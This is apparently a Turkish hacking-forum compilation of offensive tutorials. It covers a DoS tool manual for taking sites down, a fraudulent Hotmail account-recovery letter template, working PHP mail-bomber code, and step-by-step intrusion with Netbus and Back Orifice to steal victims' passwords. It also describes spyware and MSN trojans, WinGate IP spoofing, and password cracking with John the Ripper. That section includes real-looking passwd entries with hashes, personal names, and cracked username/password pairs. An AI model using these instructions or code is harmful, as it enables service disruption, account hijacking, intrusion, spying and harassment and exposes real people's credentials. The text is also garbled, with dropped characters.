Hedef Site: buraya test yapacagnz sitenin domain nini bana http:// koymadan direk www.deneme.com eklinde yazn Soru: baz sitelerde sub-domain kullanlyor ve banda www olmuyor bu durumda ne yapacaz? Cevap : rnein test yapacagnz sitenin forumu http://forum.siteadi.com/ eklinde ise Hedef site blmne yine bana http:// koymadan direk forum.siteadi.com eklinde yazn Thread : Buraya bilgisayarnzn zeliine ve balant hznza gre bir deer yazn. bu blm test yapacagnz sitenin / server rn zeliklerine grede belirlemeniz gerekebilir. rnein kendi dedicated server rnda olan bir siteyi indirmek iin normal shared host tan hizmet alan bir siteden daha fazla thread kullanmak gerekebilir Tarayc : Bu blm degitirmenize gerek yoktur. ancak site adminleri isapi ile belirliyi tarayclarn siteye erimesini engellerse bu blm degitirerek yine test yapabilirsiniz. stek Sayfas : buraya test yapacagnz sitedeki sayfa adn yazmanz lazm. bu blme zelikle php , asp gibi server r yorabilcek sayfa adrslerini yazmanz iyi olur. rnein bir portal sitede www.siteadi.com/index.php ise istek sayfasna index.php yazmalsnz rnein test yapacagnz sitede forum varsa ve bu direk dizine degilde alt dizine kurlu ise yani www.siteadi.com/forum/index.php eklinde ise istek sayfasna forum/index.php yazmalsnz. rnegin test yapacagnz sitede forum veya portal scripti farkl bir dizinde ise yani www.siteadi.com/bb/index.php eklinde ise istek sayfasna bb/index.php yazmalsnz Referer: bu blm ama iin kullanbilinir. 1. Hotlink korumas olan sitelerde : rnein siz siteye girmek iin wwww.siteadi.com/forum/index.php eklinde internet explorer raz yazdgnzda sizi farkl bir sayfaya ynlendirip ordaki linke tklarak foruma girmeye zorluyorsa referer blmne test yapacagnz sitenin adresini http://www.siteadi.com/tiklanansayfa.htm eklinde yazmanz lazm

burda tiklanansayfa.htm den kasit udur siz siteye veya foruma girdiginizde size giri iin bir resime veya linke tklamanz istenen sayfann url sini gireceksiniz. rnek 1. foruma giri iin index.htm den bir linke veya resime tklamanz isteniyorsa referer blmne http://www.siteadi.com/index.htm yazmanz gerekli rnek 2. foruma giri iin direct.html den bir resim veya linke tklayarak giriyorsanz referer blmne http://www.siteadi.com/direct.html yazmanz gerekli 2. Salak adminleri artmak iin piyasaya bilgisiz adminle dolu: siz www.xxx.com sitesine test yaparken referer blmne http://www.yyy.com/ yazarsanz www.xxx.com admin leri loglarda sanki www.yyy.com dan gelmi gibi grebilir. ama bunu bilgili admin ler yemez esas amac hotlink korumasn amaktr mza : Bu blme server loglarna brakmak istediginiz imzay girebilirsiniz. test yaptnz sitenin adminleri ve server adminleri log larda sizin imzannz grecektir. rnek : KeNZoBoY was Here rnek 2: zuhahaa sie lan artk ne isterseniz yazn

--------------------Basic Auth Bu zelik ifre korumas olan siteler iindir. diyelimki siz bir siteye kafay taktnz gnlerce kapatnz buray bu sitenin admini parola korumal klasr olarak yapabilir siteyi yani siz www.siteadi.com diye girdiginizde veya www.siteadi.com/forum/index.php diye girginizde pop-up olarak bir parolo ekran ile karlarsanz admin orda sizden belli bir kullanc ad ve parola girmenizi isteyecektir. eyer admin diyalog ekrannda ortak bir kulanc ad ve parola belirlemise Basic Auth ta username ye kullanc adn password dada ifreyi yazn eyer ortak bir kullanc ad ve parola yoksa ve illa ifre istiyorsa siteye girmek iin kullanc ad ve parolay kafanza gre biiler sallayabilirsiniz baz sitelerde basic auth korumas ile referer korumas birlikte konur bu durumda siz ortak kullanc ad ve parolay yazn birde hangi sayfadan tklatp foruma sokuyorsa o sayfann url sini de referer ra yazn bylece yine siteyi/server r kapatrsnz ilemez duruma getirirsiniz

ok Yap: Saldr srasnda aktif olan bu buton server ra ani ok lar yaparak server r fel eder. Saldrya baladktan bir iki dakka sonra ok Yap butonuna 2-3 kere basabilirsiniz.

iin suyunu karmayn ok basmayn Hidden Attack Mode : Yine saldr srasnda aktif olan bu buton da program gizleyebilirsiniz. ayrca bu butona basmadan nce Ctrl + Alt + Del ptal check box sn iaretleyip bu butona basarsanz program Ctrl + Alt + Del tuunu iptal edecektir. ------------------------------------Proxy Kullanma Proxy Kullan kutusunu ieretleyin gelen pencereden listeye alan salam proxy leri ykleyin proxyler iport formatnda olmasna dikkat etin proxy ile test yapmann temel amalar: direk kendi ip adresinizden test yaptnzda ip adresiniz banlanabilir bu durumun nne gemek iin programa proxy server zerinden test yapabilme zellii eklendi Proxy kullanarak yaplan testin amac hem siteyi kapatmak oldugu gibi sitenin bandwith ini ar derecede yiyerek sitenin suspend olmasn salamaktr soru : Proxy ile test yapyorum ama site kapanmyor neden? cevap : Kullandnz proxy says + proxylerin hz + kullandnz thread says + balant hznza orantldr etkisi ama proxy zeliindeki temel ama ook band yiyerek sitenin suspen olmasn salamaktr fakat yaptgmz onlarca testte grdkki proxy ler salam olduktan sonra yine asp php gibi dinamik sayfalardan oluan siteler portallar ve forumlar hemen kapanm ve bir sre sonra suspend olmutur

soru ve teknik destek iin : oyasiye@hotmail.com kenzoboy@1numara.org veya bu balk altnda yazabilirsiniz --------------------Yeni verisyon Bildirimi : te Beklenen An Geldi. NA Security Tester v2.9.5 Download da sunuldu. www.1numara.org adresinden srekli gncel linkler verilcektir. ve bu topicte ve benim imzamda da srekli gncel linkler olcaktr. Yeni versiyonda gelen deyiiklikler 1-) oklu Dinamik Dil Destei Eklendi. Program kullanan kii program istedii dile evirebilcek. bunun iin Languages klasrn iindeki English.lng dosyasnn bir kopasn yine o klasrde kendi diladi.lng eklinde yapp. o dosyay notepad ile ap : iaretinden sonrasn kendi diline evirmesi yeterlidir. program otomatik olarak o dile evrilecektir. rnek

0)I Agree:I Agree satrn :aretinden sonrasn kendi diline evirecektir. rnegin Trkeye evirirken 0)I Agree:Kabul Ediyorum eklinde olcaktr. Kabul Ediyorum blmn evirmek istedii dile evirip dosyas kaydetlemisiniz. uan Trke ve nglizce evirisi var. ilerde eklencektir yeni diller farkl dillere eviren veya evirebilcek arkdalar ltfen dil dosyasn oyasiye@hotmail.com adresine yollasn bizde download da sunalm bylece o dili bilen insanlarda faydalansn. 2-) Hedef Site ve stek Sayfas Tek Satrda. birok kullanc istek sayfas blmnde zorluk yayordu. biz iki satr tek satra dntrdk bundan sonra site adresi yazarken adresi istediiniz formatta yazabilirsiniz yani tm adresi Hedef Site Blmne yazacaksnz. Tpk nternet Explorer da yazdnz gibi. rnek formatlar www.site.com www.site.com/ www.site.com/index.php www.site.com/forum/index.php http://www.site.com http://www.site.com/ http://www.site.com/index.php http://www.site.com/forum/index.php http://site.com http://site.com/ http://site.com/index.php http://site.com/forum/index.php site.com site.com/ site.com/index.php site.com/forum/index.php not: burdaki index.php rnek olarak verilmitir. saldrcanz sitede adres neyse aynsn yazn. internet explorer den copy paste de yapabilirsiniz 3-) statistikler Daha Grsel Hale Getirildi Kabul Edilen ve Red Edilen Paket Saysna Yzde Oran Kondu yani kabul edilen ve red edilen paket saysn ve bunun yzde ka olduunu grebilceksiniz. 4-) Gzle Grlmeyen yiletirilmeler yapld filtre sistemi iyiletirildi. kodlama daha kararl hale getirdi bir iki ufak hata giderildi. 5-) Reklam Modl eklendi. Bugne kadar bu program hep cebimizden reklamsz ve cretsiz olarak sizlere sunduk programon gelitirilmesi srasnda harcanan masraflarn yan sra programn almasda bize masraf getiriyor. yani sizin yaptnz her saldr bize masraf getiriyor. otomasyon server rn masraflar demek istiyorum. yeni srmde gelen grler dorultusunda kullancy rahatsz etmiycek boyularda ( 468*60 ) banner reklam uygulamasna geildi. programn gelitirilmesine destek vermek istiyorsanz reklamlarmza tklayabilirsiniz. ayrca bu ok popler bir program ve gittikede poplerleiyor. zelikle oklu dil destei eklememizden sonra yurt dna alcak bir program poplerlii katlancaktr. bu programa reklam vermek istiyorsanz oyasiye@hotmail.com mail atn veya msn e gelin grelim. download etmek iin www.1numara.org adresindeki linkleri kullanabilirsiniz. bu adresteki linkler srekl gncellenecektir.

Not: 2 hafta Sonra Eski Tm NA versiyonlarn almas iptal edilecektir. Ltfen yeni srme geiniz. --------------------------------------------------------------------------------

alnan Mail 24 Saat inde Geri Alma


Mailiniz alndysa bunu baka bir maille belirtip ifrenizi size yolluyolar yapmak iin okuyun.. http://register.passport.net/contactus.srf BU ADRESE GRN VEYA ALTTAK TALMATA GRE MAL ATIN ALTAK

DAHA UYGUN To: passport@css.oneBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr Sent: Mon Jul 7 23 : 30 : 39 PDT 2003 Subject: RE: CST122446699ID - Passport Dear Sir / Madam I have been having proplem with my hot mail address. When I try to access to my account after ( BURAYA HACKLENEN TARH YAZ) I found out my password and the secret question have been chanced.When I send you a request about new password the ynformations also were not match the ones I remember and the ones you recorded. I also have seen someone is using my mesenger and chating with others on behalf of me.My phone bills credit card extres information come to this account and this person gives my phone numbers the other people. thanks your answer. my name is: SM sign in: MAL ADRESN my birthday : DOUM TARHN country: ULKE state: EHR zip or postal code: POSTA KODU successfull sign: ENSON BALANDIIN TARH Approximate date of account registration: NEZAMANDIR BU ADRES KULLANDIIN List as many former passwords you used with this account as far back as you can remember: KULLANDIIN FRELER List as many of your Folders as you can remember: SAKLADIIN DOSYALAR VARMIYDI MALNDE VARSA HATIRLADIKLARIN my internet service provider isNTERNET BALANTININ ADI I would like you to solve this problem.Could you change the password and send me new one so this can not use my account. If this is not possibble could you cancel my account. Thankyou in advance , sincerely

Icq'da Ip Ogrenme / Gizleme Yollari


Dowload Ksmndan Program aldktan sonra Dkman okuyup kolayca zebilirsiniz.. WhereIsIp adli programi bilgisayara kuruyorsunuz. Daha sonra icq connections a bakip online olan herkesin ipsini goruyorsunuz. Bir diger yol ise icq versiyon ve buildinize gore bir ip crack kullanmaktir. Icqnuzu crackledikten sonra icq detail /email de ipsini gorebilirsiniz. www.mirabiliz.com 'a bir bakim icq crackleri icin

Kendi MailBomber'n Kendin yapma


Artk kendi mail bomber nz kendiniz yapn kodlar almaktadr deneyin ve sonucu grn :) $mailto = "

adamin@maili.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak
olmaldr"; $subject = " konu "; $Headers = "From: mesajnzfgagawgawgawgawgag "; $toplam=100; for ($t=1;$t<$toplam;$t++){ if (mail($mailto,$subject,"toplam: $toplam / $t Mail.",$headers)) echo "Gitti"; else echo "Gitmedi"; } ?> yukaridaki kodlari alin ve bir not pade icine yapistirin {degistirmeniz gerekenleri degistirin. rnek: adamin mailini yazin} ve farkli kaydet seceneginden dosyayi bir php dosyasi olarak kaydedin. orn; kedi.php gibi. sonra bu dosyayi alip sitenizin serverina kaydedin. yani benim sitem : www.sitem.com ise bu sayfa : www.sitem.com/kek.php olarak kaydedilmeli. boylece bu adresi her tikladiginizda adama 100 mail gidecek eger daha fazla gndermek isterseniz: $toplam=100; kodunda 100 yazan yere istediginiz rakami yazin. php destekli siteniz yoksa lycos tan bir tane alin. ama lycos free server oldugu icin siniriniz var maksimum gunde 150 gonderiyor.

Bakasnn Pc'sine Girmek


Bilgilerin Hepsi nemlidir ama alttan balym bunlar bilmek gerekir.. BASKASiNiN BiLGiSAYARiNA GiRMEK : Baskalarinin bilgisayarina girme ve internet sifrelerini calma olaylari nasil olur. ilk olarak bu olaylari gerceklestirmek icin 4 adet programa ihtiyacimiz var... Wingate, Netbus,Bo, Telnet (her windowsun icinde vardir)... Diger programlari hack download bolumunden rahatlikla bulabilirsiniz ilk olarak irc'de kendimize bir kurban secip, ip numarasini aliyoruz (/dns nickname).. Sonra wingate'i calistiriyoruz... "Hostname or Ip" yazan yere kurbanimizin ip numarasini giriyoruz... "Scan Port" kisminda 23 seklindeki rakamlari 12345 yapiyoruz sonra asagidan 3. secenek olan try to open the port only" i secerek "scan!" butonuna basiyoruz.. "Servers found" kisminda bir kac tane ip yazmasi lazim sansa bir tanesini secin... Sonra netbus'i (eger netbus kullanmayi bilmiyorsan Hemen grenmeye alis.) calistirip hostname/ip yazan yere wingateden buldugunuz IP'yi yazin...

Sifre isterse telnetten sifreyi kirmamiz lazm..Eger sifre istemezse isiniz kolay... Eger sifre isterse ne yapicaz ? Hemen Panik yok anlatiyoz iste... Telnet her windowsta vardir... Bul (find) dan telnet'i buldurup calistirin... Baglana gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede buldugmuz IP'yi yaziyoruz Baglanti Noktasi kismina ise netbus portu olan 12345 yaziyoruz... baglana tikliyoruz.. yukarda netbus 1.6 veya 1.7 yazar.. simdi sifreyi kirmak icin Password;1;123 ServerPwd;fatihsayi bu yaziyi pasteliyoruz...ve sifre fatihsayi oluyor,siz fatihsayi yerine baska biseyde yazabilirsiniz... Sonra bir daha netbus'a bakiyoruz artik sifre fatihsayi giriyoruz...Ve gm kurbanin bilgisayarindayiz... File Manager'a gelerek Kurbana boserve.exe yi yolluyoruz...nereye yolliycagimizi soruyor... c:\windows yazarak windowsun altina atiyoruz yolladiktan sonra download ekranini kapiyoruz... start program diyoruz...c:\windows\boserve.exe diyoruz... tamam netbustaki isimizde bitti... Simdi Back Orifice'ye(Eger Bo kullanimida bilmiyorsan "HEMEN GREN") geiyoruz target hostport'a kurbanin IPsini yaziyoruz. yan tarafada 12345 yan taraftan system passwordsu secip send e basiyoruz ve bingoooo bu adamda 10un ustunde password varmis... Bo ile daha cok sey yapabilirsiniz...Bu arada kurbanda cikan pass'ler:Eger basarisiz olursaniz ki bunu hic zannetmiyorum cnk bundan dahada bi basit sekilde nasil anlatilir bilemiyorum

VatosAjan 2.4
Vatos sper bir hack programdr kesin renmeniz lazm :) VatosAjan 2.4 Hakknda; VatosAjan bulat bilgisayarn zelliklerini,kurbann ifre ve keylog kaytlarn mailinize gnderen Bnyesinde bulunan FTP Server ile kurbann bilgisayarna balanlabilen,Sadece VatosAjan'da bulunan WEB KONTROL zellii ile router veya direk balant farketmeksizin kurbann bilgisayarnda dosya arama,dosya silme,istediiniz dosyalar mailinize gnderme,downloader gibi alp, istediiniz dosyalar internetten indirip altrabilme,mail adresinizi deitirebilme,registry kaytlarna ulaabilme ve kendisini silme emirleriniuygulayabilecek interaktif bir casus yazlmdr. VatosAjann alabildii ifreler aada yazlmtr. Versiyon Farklar -Win9x sistemlerde stabil almas saland -FTP Server eklendi -Server ve serverin kulland dosyalar disk zerinde gizlendi -Kullanlan componentler deitirildi -Firewall ve Antivslerin kapatlmas saland -Web Kontrol iin firewall By Pass edildi -Servere ayar ileme yntemi deitirildi -Serverin baka bir dosya ile birleince simgesinin korunmas saland -lk altrlma esnasnda sahte hata uyars verebilme zellii eklendi -icon seim yntemi deitirildi.Bylece kendi iconlarnz da kullanabileceksiniz. -Server Uzantsn deitirebilme imkan eklendi -Client grnm ve logo deitirildi -Trke ve ngilizce Dil Seenei eklendi ///////Alnabilen ifreler\\\\\\\\\\\ # MSN Messenger # Windows Messenger (In Windows XP) # Yahoo Messenger (Versions 5.x and 6.x) # ICQ Lite 4.x/2003 # AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered) # AOL Instant Messenger/Netscape 7 # Trillian # Miranda # GAIM # Outlook Express # Microsoft Outlook 2000 (POP3 and SMTP Accounts only) # Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts) # IncrediMail # Eudora # Netscape 6.x/7.x # Mozilla Thunderbird # Group Mail Free # Yahoo! Mail - If the password is saved in Yahoo! Messenger application. # Hotmail/MSN mail - If the password is saved in MSN Messenger application. # Gmail #Otomatik tamamlanan Internet Explorer ifreleri, #MSN Explorer ifreleri,

FunMaker2004
Msn'den olsun btn hereyi renin karnzdaki pc de neler oluyor :) Kesinlikle exe yi kendi pcnizde acmayn. Bu dosya kar tarafa yollanacak (MsnFunMakerV204.EXE)- exe nin adn degitirebilirsiniz ama uzantsn degitirmeyin. Yani MsnFunMakerV204.EXE yerine ecard.exe yapabilirsiniz. - Kurbana exe yi yolladnz ve kabul ettiyse dolaysyla caltrdysa ; "Error, couldnt finde file win32.dll" eklinde bir hata mesaj alacak ve msn i kapanacakdr. Yani offline oldu ise kurban amacmza ulamz demektir. - Bu aamadan sonra kurban sizi engelleyemez (block layamaz) buda u makmdan nemli aagdaki komutlar kurbana yacagmz iin engellememesi gerekiyor bizi. - Aagdaki komutlar kurbanzla yazyor gibi ona mesaj yazdgmz yere yazyoruz. Bu komutlar kesinlikle kurban tarafndan gzkmyor KOMUTLAR : name(...) Kurbann nickini degitirir. rnek : name(Dallama) yazarsanz kurbann nicki dallama olur msg(...) Kurbann pc sinde kck bi pencerede mesajnz yazar. www(...) Kurbann yazdgnz adresi acmasn saglar. _spy Geldik asl olaya : Kurbana gelen btn mesajlar kurbann yazdg btn mesajlar grrsnz. bu zelligi kapatmak icin chat penceresini kapatmanz yeterli. tekrar balamak icin _spy komutunu tekrar yazyoruz. bide koparsak geri baglanrsak tekrar yazyoruz. _nosend Kurban n yazdklar siz haric kimseye gitmez ama o gittigini sanr. Acklamarn Hepsini cevirmiyorum Ksaca : 1 ay icinde kendi kendini kaldryomu. devam edecekseniz tekrar yollamanz gerekiyor. firewal lara taklma ihtimali var, ansnz yar yarya yani kolay gelsin..

WINGATE ILE IP SPOOFING


Esasinda wingate 1 den fazla bilgisayarin bir internet baglantisini kullanmasini saglamak icin kullanilir.Ornek:internet cafeler. Biz winGate in telnet cikisini kullanacagiz.(port 23)Bir wingate server da yani wingate yuklu ve calismakta olan makinada 23. port a telnet cektiginizde

su cevabi alirsiniz. WinGate> bu komut satirinda komutlar vererek baska yerlere baglanmak mumkundur.Tabi burdan baglandigimiz makinalarda bizim degil baglandigimiz wingate server in ip sini goreceklerdir. Asama -1- Bir wingate server i bulma: Bunun icin en temiz yol domain scanner yada gate scanner adi verilen programlardan kullanmak ve boylece kendi serverlarimizi bulmaktir.Piyasada disariya acik oldugu bilinen yuzlerce server vardir ama bunlari kullanmanizi tavsiye etmem cunku herkes onlara yuklendigi icin bunlardan spoofladiginizda lag a girersininiz.Tavsiyem GateScan programi.Bu program verilen ip araliklarinda secilmis bir port un acik olup olmadigini ; eger aciksa belli bir cevabi(recieve string) verip vermedigini kontrol eder. Normal durumda,siz degisdirmediginiz surece(halimize bak bi default lafi kullanmicaz diye kendimizi paraliyoz) port 23 ve receive string WinGate> dir yani wingate serverlarini tespit etmeye hazirdir.En ustteki kutuya bir ip yazdiginizda ornegin 194.54.48.63 olsun 194.54.48.0 dan baslayarak 194.54.48.255 e kadar hepsinin 23 . portuna baglanacak WinGate> cevabini verip vermediklerini kontrol edecektir.Tavsiyem irc ye girin millete dns cekin gelen ip leri buraya yazin.En guzel serverlar Boyle Gecici ip lerden cikar. Ama 2 saat sonra nolucagini bilemezsiniz.emin olmak isterseniz sitedeki wingate listesindeki server lari kullanin. Simdi wingate ip lerimiz hazir dielim. Mesela ip miz 195.33.226.5 olsun.Spooflayacagimiz server da irc.emu.edu.tr olsun mIRC yi acin

/server 195.33.226.5:23 ----------->bu komutla sanki bir irc server a baglanir gibi wingate server a baglaniyoruz.Ayni sekilde isterseniz add server ile listenizede ekleyip sonra bu server lara direkt connect te edebilirsiniz. bir suru yazilar gelecektir look up failed falan filan gibi onlari hic takmayin.WinGate> demesini bekleyin...... WinGate> deyince /quote irc.emu.edu.tr:6667 ---->Bu komutla irc server a o server dan atliyoruz. Yine bisuru sey sayikliyacaktir onlari da iplemeyin .... Muhim olan "irc.emu.edu.tr Connected" demesi.Bunu gorunce /quote user xxxxx xxxxx mail@adresiniz.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr xxxxx --> bu xx lerin veya mail in oldu yerde ne yazdy?y muhim degildir.Bunlar millet size whois cektiginde gorunecek yazilardir.Istediginizi yazabilirsiniz muhim olan kelime

sayisinin ayni olmasi. /quote nick isminiz Bundan sonra bekleyin her zaman oldugu gibi irc de olmaniz gerekir.Eger olmassa baska serverlar deneyin.Girdiginiz zaman kendinize /whois ve /dns cekerek spoof unuzu deneyebilirsiniz

FRE BULMA VE KIRMA


John The Ripper Programyla Acc kirmak icin passwd diye adlandirilan dosyalardan elinizde bulunmasi lazim bunu bazi yeni isp lerin ftplerinden (oranin ftp kullanici iseniz genelde etc/passwd dizininde bulunurlar) cekmenize izin verirler.Anonymous baglantilarda bu dosyalari cekmenize izin verilmez. Bu tip dosyalari toparladiktan sonra. John The ripper programini cekmelisiniz. Simdi John da kendiliginden 3 adet kirma bicimi var. Bunlar: ALPHA : Sadece harfler DIGITS : Sadece rakamlar ALL : Hepsi Simdi John.ini dosyasn atgnzda oradan kullanacagnz bicimi bulun. Mesela ALPHA yi bulalm. Bulduk Simdi altta Minimum ve Maximum lenght var. Bunlar en az ve en cok hane saysdr. SOL dnda Turkiye'deki butun ISP lerde minimum 4 maximum 8 hane vardir. Tamam bunuda ayarladk diyelim. Daha sonra dos komut satrnda, unlar yazn: JOHN dosyaadi -i:bicim -beep (burada dosya adi bizim netten cektigimiz passwd dosyasi oluyor. Burda bicim yerine ALL ALPHA veya DIGITS yazicaksiniz. BEEP ise her pass kirdiginda bip sesi cikarmasini saglar. rnek : John passwd.txt -i:ALL -beep heee bide wordlist ile Kirma Yntemi vardir. Bu Yntem ok Degisiktir:ilk nce bir wordlist yaratirsiniz (ok iyi Bir Arsiv Hazirladim!!!Kesin Bulundurun!! Woodlist John butun harfleri ve digitleri teker teker deneyecegine sizin verdiginiz Dosyadaki kelimeleri dener!! Kullanim Yntemi ise:: john <dosya adi> -w:<wordlist adi> -beep ------------John The Ripper Kullanma Kilavuzu----------John the Ripper(kisaca John amca) bence piyasada bulabilceginiz en baba unix passwd cracker dir.simdi siz herhangi bir yntemle passwd yi cektiniz.Ama birinci soru bu passwd shadowed mu.Shadowed passwd lerde sadece o user in sifresinin shadow file daki yerini belirten bi sayi olur ve o sayiya gre makine shadow file a bakar ve o username icin girelen password ile dosyadaki password u karsilastirir. Yani asil almaniz gereken dosya shadowed sitemlerde /etc/shadow dur ama bu dosyaya erisim hakki sadece super user a aittir.(root)Yani sikar biraz. Kisaca Shdowed bi dosya Shadow file olmadan bi bok a yaramaz.Kiramazsiniz Alin size Shodowed ve un Shadowed passwd rnekleri:: Bu satirlar shadowed bi passwd dosyasindan alinmistir(ispronet Clansman'dan aldm lawuk shadowed u cekmis euheuhe) root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh toor:*:0:0:Bourne-again Superuser:/root xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent ilk satiri inceleyelim s.N= shadow nosu=shadow file daki no su |user| |s.N| |ayrintilar| |dizini| |shell dizini ve turu| root:*:0:0:finland.ispro.net.tr,ISPRO:/root:/usr/local/bin/tcsh Bu satirlarda shadow lanmamis passwd den:: (Bm -Net) atabarut:iP0nvdXsd0bE2:504:100:Necdet Atabarut:/home/atabarut:/bin/sh abali:btf6TGc5jaCwY:505:100:Muammer Abali:/home/abali:/usr/local/bin/dmenu ceyhun:7kTb6N0tEaTcE:508:100:Ceyhun Ors:/home/ceyhun:/usr/local/bin/dmenu kadircan:xt4UmVJxTBpbw:507:100:Kadircan Abali:/home/kadircan:/usr/local/bin/dmenu Sanirim bunda incelemeye gerek yok olay acik.Ayni seyler gecerli.

-----------imdi gelelim krma ilemine-----------Benim tavsiyem Wordlist yani kelime listesi kullanmaniz. Eger Wordlist ne derseniz belli sayida harfin tum kombinasyonlarinin her satirda bir kelime olmak uzere metin dosyasi haline getirilmisidir. Wordlist olusturmak icin meliksah aganin Sibop unu tavsiye ederim. (8 karakterli bir wordlist= 1.5 GB) ------John un wordlistli kirma komutu------john -wordfile:wordlist dosyasini buraya yazininiz -pwfile: sifredosyasini buraya yaziniz. > kirilan sifrelerin kaydedilecegi dosya adini buraya yaziniz. size bi tavsiye 4 karakterli sadece sayidan olusan bi wordlist hazirlayin (0.5 mb bile tutmaz)Dogum tarihini sifre yapanlari yakalarsininiz. ha bu arada son kisma kayit dosyasi yazdiimiz icin eger bi bokluk ciksa bile john bisey demicektir.sasirmayin herhangi bir hata falan verirse bunlarda o yazdigimiz dosyaya kaydedilecektir. islem bittinde bu dosyayi herhangi bir metin editru ile acip bakabilirsiniz. yada kayit dosyasi kullanmadan yapin gerci tavsiye etmem.Format falan atarsaniz yada john.pot u bi sekilde kayberderseniz. kirdiklariniz gider.Ama kayit dosyasi bu riski kaldirir. ------Kayt dosyasi olmadan kirma komutu-----------john -wordfile:listedosyasi -pwfile:sifredosyasi bu komut ile kirdiginizda sifreler ekrana cikar. -------------------rnek verim-----------------John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer Loaded 201 passwords with 170 different salts (DES) onguru10 (onguru) aytac11 (ksoytac) aytac11 (ksaytac) ali19 (ayata) tunay94 (tunay) ofalay96 (ofalay) hyb96 (ferhan )hyb96 (ertugrul) tatko97 (tatko) uler97 (mukaddes) kbc97 (kbc) susen97 (susen) ttggrd97 (ttggrd)bircan97 (bircan) bilal97 (bilal) ykocak97 (ykocak) aaker97 (aaker) levent97 (levente) aristo97 (aristo) Parantez icindekiler usernamedir. Sonradan bu kirilan acc leri tekrar cikartmak isterseniz john -show sifredosyasi yaziniz. -------------------------imdi gecelim Single Mod a-------------------Single mod da john amca sadece passwordu ile kullanici ayrintilari yada username i yakin olan sifreleri kirar.hasan-hasan98 gibi yada ayrintilarda amcuk insaat as yaziyorsa.hasan-amcukins gibi. Cok hizlidir 5 dk da ato dan 90 tane acc kirarsiniz.Bu komut cok faydalidir ama herkes ilk bunla kiracagi icin kircaganiz acc lar coktan orospu olmus herkesin eline gecmistir. Bu yuzden eger saglikli bi acc istiyorsaniz.Diger modlarda kiriniz.Komut ise syledir. John -single dosyaadi>kayitdosyasi kayit dosyasi olayina tekrar girmicem heralde kapmissinizdir. -------------------------------incremental Mod---------------------------John amca incremental mod da o an rastgele karakter kombinasyonlari ureterek (eger ayar ellenmezse kafadan(default) 8 karakterdir) bunlari sifre olarak dener. Bu da sizi wordlist kullanmaktan bi derece kurtarir ama asla wordlist kadar hizli diildir ve wordlist kadar cok kiramaz.Ayrica hic durmaz bu ctrl-break cekerek siz durduracaksininiz.Bu modda kayit dosyasi tavsiye etmem cunku uzun sure bi sey kirmadiginda anlayamaz,bu yuzden de ne zaman kapatmaniz gerektiini kestirmezsiniz. --------------Komut------------John -incremental:xxxx dosyaadi burdaki xxxx incremental in cesitidir.Buraya all yazarsaniz tum karakterler. Digits yazarsaniz sayilar(dogum tarihini sifre olarak kullananlar icin birebir).Alpha yazarsaniz harfler uretilir. Temel Komutlar bu kadar ha bide unutmadan BEEP olayi var yazdigimiz bu komutlarin herhangi birine -beep eklerseniz her sifre bulduunda pc

hoparlrunden biiiip sesi gelir.Ben bunu hep kullanirim.Yan odada Tv seyrederken Pc odamda sifre kirar ve biiip sesini duyunca pc nin basina kosarim hemen. ---------------------------Son-----------------------Ufak bir not: Wordlistler degisken olduklari icin bu sayfada yayinlanmamistir. ister kendiniz yapin ister bir yerlerden bulun.Biz turkiyeli oldugumuz icin yabancilarin yaptiklari wordlistleri kullanmayin ---------------------Bir Eklenti----------------www.ibm.net ten sahte account alin orada baglanti programini da cekin. Authorization codu soracak size: (ibmbyob) yazin (ibmnet de yazabilirsiniz) ikinci bir yol ise alin su programi gidin internet baglantisi olan bir arkadasiniza yada internet cafe ye bu programi calistirip yildizli password un ustune dogru surukleyin

SISTEM HACK & ROOTING


Genel olarak herkes site hackleme peinde kouyor.. Biz ise sistemleri nasl hackleyeceinizi retiyoruz.. Zaten sistemi hackleyip kendi ynetimine alnca o sistemde bulunan siteler elinin altna gelmi olacaktr.. sistem derken shell veren bir makine yada web serverlarn kast ediyoruz.. zerine kurulu daemon larn an kullanarak yada local attack lar dzenleyerek sistemi sahiplenebiliriz.. Bu olaylar gerekletirirken biz Sistem aklarn kullanmamz salayan minik progragramcklar olan Exploit leri kullanrz.. Exploit Nedir: Exploitler genel olarak .c ve .pl uzantl dosyalardr iinde kodlar vardr.. .c uzantl olan dosyalar C dili ile yazlm kaynak kodlar ierir .pl olanlarda perl dili ile yazlm kodlar ierir.. Bunlar haricinde assembly dili ile yazlm olanlarda vardr.. imdi bu exploitleri yazan hslarn C dilini yalam yutmu sistemleri gz kapal anlatabilecek seviyede olan hacker lar n yazdnda sylemek isterim.. Exploitler attack trne gre 2 ye ayrlr.. 1- Local Attack.. 2- Remote Attack.. Yzeysel olarak anlatmak gerekirse Local attack uygularken sen olduun makinadaki kstl yetkini ap root olmak iin urarsn.. Bunun iin local root exploitler kullanlr.. Tabi burda genel konuuyorum baka amalar iinde local Exploitler kullanlabiliyor.. Remote Attacklar ise Alakan olmayan bir makina rnein bir web server burda senin account un yok bu makinaya local bir attack dzenleyemezsin.. Bunun iin remote tr attacklar la remote exploitler kullanlabilir.. Bu remote Exploitlerin bir ksm seni makineye drr sonrasnda local root tr bir exploitle root yetkisine geersin.. Bi ksmda Remote Root tur ieri dtn zaman id ksmnda Root yazar.. Ksaca mantk budur.. Exploitler kaynak kod halinde olduu iin bunlar Compile (derlemek) edilmelidir.. Bunun iin windows altnda alan compiler lar mevcut olsada.. Exploitler in geneli Linux makinede Compile edilmek zere tasarlanr.. Yani o ekil yazlr.. windows altnda compile etmek isteyince .h library ha! tas verecektir.. Linux makinedeki "gcc" Compileri bu i iin ok uygundur.. Exploitleri compile etmek iin 1 ka seenek douyor.. 1 Shell hesab alarak oradaki gcc compilerini kullanabilirsiniz.. Yada kendi bilgisayarnz herhangi bir Linux datmn ykleyebilir komut satrn shell olarak kullanabilirsiniz.. Tavsiyem shell dir.. Hem komut tabanl kullanlyor hemde balant hz olduka

